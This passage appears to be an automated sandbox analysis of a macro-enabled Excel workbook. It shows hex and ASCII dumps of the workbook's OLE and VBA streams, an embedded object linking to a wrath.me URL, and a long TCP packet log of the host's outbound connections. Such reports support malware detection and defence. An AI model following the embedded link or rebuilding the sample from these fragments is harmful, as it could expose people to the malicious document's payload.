              Data Raw:25 50 44 46 2d 31 2e 37 0a 25 f6 e4 fc df 0a 31 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 54 79 70 65 20 2f 43 61 74 61 6c 6f 67 0a 2f 50 61 67 65 73 20 32 20 30 20 52 0a 2f 41 63 72 6f 46 6f 72 6d 20 32 34 20 30 20 52 0a 3e 3e 0a 65 6e 64 6f 62 6a 0a 38 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 4c 65 6e 67 74 68 20 32 0a 3e 3e 0a 73 74 72 65 61 6d 0d 0a 71 0a 0d 0a 65 6e 64 73 74 72 65 61 6d 0a 65
              Stream Path: MBD0015E099/Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 218908
              General
              Stream Path:MBD0015E099/Workbook
              CLSID:
              File Type:Applesoft BASIC program data, first line number 16
              Stream Size:218908
              Entropy:7.606771386739727
              Base64 Encoded:True
              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . ` < x - 9 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . . . . . . .
              Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
              Stream Path: MBD0015E09A/\x1Ole, File Type: data, Stream Size: 368
              General
              Stream Path:MBD0015E09A/\x1Ole
              CLSID:
              File Type:data
              Stream Size:368
              Entropy:6.3143437291346585
              Base64 Encoded:True
              Data ASCII:. . . . w . T @ @ - 1 . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . s . : . / . / . w . r . a . t . h . . . m . e . / . 5 . H . 4 . s . u . d . . . m . y N . . \\ c ] . 1 E _ < $ . . 8 z b = N P q . T # } _ c o L . A B d . . C ! 7 B 0 4 . k . % . h s ' . c J c $ E . . / J } n O - O a . % Q P 7 0 w ~ . . - @ . Q k . 8 P n T 1 & ` . f . . P . . . . . . . . . . . . . . . . . . $ . . . 4 . V . j . i . 4 . k . O . h . H . x . L . 4 . 2 . c . 3 . w . V . . . Y Q Y I S U * 9 R L e . ? r
              Data Raw:01 00 00 02 77 08 fd 54 40 40 2d 31 00 00 00 00 00 00 00 00 00 00 00 00 ec 00 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b e8 00 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 77 00 72 00 61 00 74 00 68 00 2e 00 6d 00 65 00 2f 00 35 00 48 00 34 00 73 00 75 00 64 00 00 00 6d b7 10 f7 fc 79 4e 06 d5 0d 5c 63 89 5d c2 aa ae 8c b4 d3 20 31 45 5f 3c 92 ad af 24 ed 87 2e
              Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 339337
              General
              Stream Path:Workbook
              CLSID:
              File Type:Applesoft BASIC program data, first line number 16
              Stream Size:339337
              Entropy:7.998570574743122
              Base64 Encoded:True
              Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . ! . r K 7 ( > . . i a ^ X W . r f E 0 ] ( 4 . i c M . . . . . . . . . . . . \\ . p . @ d n > > . . . L . D . 3 f N . . [ Y ] L . . Y [ a . { O . 2 . { . ' \\ . Z . . P ^ r / . ~ . L D > . * ) U . \\ . f B . . . . a . . . . . . = . . . . . l . . . v ( h Z 4 . . . _ . . . . > . . . . . . . . . . . . . . . . g = . . . " ! x 5 + B . t ! b @ . . . 9 . . . a " . . . . . . . . - . . . o . . . 1 . . . H V R . Y ) ~ . A . X . R - . T 1 . . . 6 . R 7 p q J F y . 2 M
              Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 21 0f 72 95 4b f7 37 89 ca 28 3e 1a 93 13 69 c5 d7 61 f2 99 90 5e df 58 57 c7 07 72 b0 66 45 30 5d 98 bd 28 e7 34 c9 cc a6 fd 69 e6 63 b5 4d 18 e1 00 02 00 b0 04 c1 00 02 00 8b 2e e2 00 00 00 5c 00 70 00 40 64 c6 6e a0 8b 3e 3e e4 1b 07 fb c4 ec f4 a9 ac 94 92 a9 dd 0e 88 4c c7 06 44 17 33 66
              Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 529
              General
              Stream Path:_VBA_PROJECT_CUR/PROJECT
              CLSID:
              File Type:ASCII text, with CRLF line terminators
              Stream Size:529
              Entropy:5.275468832218868
              Base64 Encoded:True
              Data ASCII:I D = " { B E D C 0 6 9 A - D F 0 0 - 4 E 2 1 - 9 F 3 5 - 0 7 4 3 C E 2 4 F 5 8 6 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " D A D 8 3 6 7 9 F 7 7 D F 7 7 D F
              Data Raw:49 44 3d 22 7b 42 45 44 43 30 36 39 41 2d 44 46 30 30 2d 34 45 32 31 2d 39 46 33 35 2d 30 37 34 33 43 45 32 34 46 35 38 36 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
              Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 104
              General
              Stream Path:_VBA_PROJECT_CUR/PROJECTwm
              CLSID:
              File Type:data
              Stream Size:104
              Entropy:3.0488640812019017
              Base64 Encoded:False
              Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
              Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
              Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2644
              General
              Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
              CLSID:
              File Type:data
              Stream Size:2644
              Entropy:3.9850977630535067
              Base64 Encoded:False
              Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
              Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
              Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 553
              General
              Stream Path:_VBA_PROJECT_CUR/VBA/dir
              CLSID:
              File Type:data
              Stream Size:553
              Entropy:6.355777360002286
              Base64 Encoded:True
              Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . L . . i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 .
              Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 4c 0b 17 69 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

              Network Behavior

              Network Port Distribution

              TCP Packets

              TimestampSource PortDest PortSource IPDest IP
              Oct 8, 2024 15:38:23.343991995 CEST65437443192.168.2.6188.114.96.3
              Oct 8, 2024 15:38:23.344094992 CEST44365437188.114.96.3192.168.2.6
              Oct 8, 2024 15:38:23.344194889 CEST65437443192.168.2.6188.114.96.3
              Oct 8, 2024 15:38:23.344518900 CEST65437443192.168.2.6188.114.96.3
              Oct 8, 2024 15:38:23.344558001 CEST44365437188.114.96.3192.168.2.6
              Oct 8, 2024 15:38:23.823031902 CEST44365437188.114.96.3192.168.2.6
              Oct 8, 2024 15:38:23.823265076 CEST65437443192.168.2.6188.114.96.3
              Oct 8, 2024 15:38:23.828157902 CEST65437443192.168.2.6188.114.96.3
              Oct 8, 2024 15:38:23.828212023 CEST44365437188.114.96.3192.168.2.6
              Oct 8, 2024 15:38:23.828548908 CEST44365437188.114.96.3192.168.2.6
              Oct 8, 2024 15:38:23.828612089 CEST65437443192.168.2.6188.114.96.3
              Oct 8, 2024 15:38:23.829358101 CEST65437443192.168.2.6188.114.96.3
              Oct 8, 2024 15:38:23.875403881 CEST44365437188.114.96.3192.168.2.6
              Oct 8, 2024 15:38:24.233849049 CEST44365437188.114.96.3192.168.2.6
              Oct 8, 2024 15:38:24.233927011 CEST44365437188.114.96.3192.168.2.6
              Oct 8, 2024 15:38:24.233983994 CEST65437443192.168.2.6188.114.96.3
              Oct 8, 2024 15:38:24.234055042 CEST65437443192.168.2.6188.114.96.3
              Oct 8, 2024 15:38:24.456479073 CEST65437443192.168.2.6188.114.96.3
              Oct 8, 2024 15:38:24.456506014 CEST44365437188.114.96.3192.168.2.6
              Oct 8, 2024 15:38:24.458580971 CEST6543880192.168.2.672.5.42.5
              Oct 8, 2024 15:38:24.463632107 CEST806543872.5.42.5192.168.2.6
              Oct 8, 2024 15:38:24.463721037 CEST6543880192.168.2.672.5.42.5
              Oct 8, 2024 15:38:24.463906050 CEST6543880192.168.2.672.5.42.5
              Oct 8, 2024 15:38:24.469053030 CEST806543872.5.42.5192.168.2.6
              Oct 8, 2024 15:38:32.223870993 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:32.223917961 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:32.224001884 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:32.224323988 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:32.224335909 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:32.874248981 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:32.874381065 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:32.875969887 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:32.875982046 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:32.876307964 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:32.877979994 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:32.919408083 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:32.984036922 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:32.984081030 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:32.984100103 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:32.984196901 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:32.984224081 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:32.984277964 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.071239948 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.071261883 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.071441889 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.071455002 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.071569920 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.072886944 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.072930098 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.072962046 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.072967052 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.072990894 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.073004007 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.158282042 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.158328056 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.158387899 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.158411026 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.158435106 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.158457041 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.159327984 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.159368992 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.159399986 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.159419060 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.159432888 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.159461975 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.160861969 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.160906076 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.160931110 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.160936117 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.160962105 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.160995007 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.161843061 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.161885977 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.161910057 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.161915064 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.161938906 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.161957026 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.245878935 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.245913029 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.246117115 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.246143103 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.246190071 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.246248007 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.246254921 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.246320963 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.246326923 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.246365070 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.247203112 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.247221947 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.247270107 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.247277975 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.247297049 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.247315884 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.248648882 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.248676062 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.248730898 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.248734951 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.248773098 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.249161959 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.249181986 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.249222994 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.249233007 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.249249935 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.249273062 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.250133991 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.250154972 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.250200033 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.250204086 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.250230074 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.250247955 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.251061916 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.251080990 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.251128912 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.251133919 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.251164913 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.333843946 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.333923101 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.333928108 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.333954096 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.333975077 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.334008932 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.334127903 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.334170103 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.334188938 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.334196091 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.334220886 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.334239960 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.334686995 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.334728003 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.334753990 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.334758997 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.334780931 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.334800959 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.335011005 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.335048914 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.335072994 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.335077047 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.335103035 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.335120916 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.335539103 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.335597038 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.335621119 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.335624933 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.335650921 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.335664034 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.339622974 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.339664936 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.339694023 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.339699030 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.339710951 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.339734077 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.339978933 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.340020895 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.340046883 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.340050936 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.340070963 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.340090036 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.340281010 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.340332985 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.340347052 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.340379000 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.340388060 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.340424061 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.422080040 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.422111988 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.422327042 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.422332048 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.422358036 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.422460079 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.422744036 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.422765017 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.422804117 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.422813892 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.422841072 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.423264027 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.423295021 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.423327923 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.423332930 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.423360109 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.423635006 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.423652887 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.423693895 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.423700094 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.423717022 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.424062967 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.424086094 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.424117088 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.424122095 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.424149036 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.424514055 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.424532890 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.424571991 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.424576998 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.424602032 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.424910069 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.424932957 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.424964905 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.424968958 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.424998045 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.466425896 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.509825945 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.509852886 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.510062933 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.510076046 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.510091066 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.510111094 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.510217905 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.510232925 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.510302067 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.510613918 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.510628939 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.510674953 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.510679007 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.510718107 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.511122942 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.511147022 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.511198044 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.511202097 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.511241913 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.511529922 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.511549950 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.511595011 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.511605024 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.511622906 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.511636972 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.511951923 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.511965990 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.512017965 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.512027979 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.512065887 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.512399912 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.512413025 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.512459040 CEST65440443192.168.2.613.107.246.60
              Oct 8, 2024 15:38:33.512463093 CEST4436544013.107.246.60192.168.2.6
              Oct 8, 2024 15:38:33.512505054 CEST65440443192.168.2.613.107.246.60
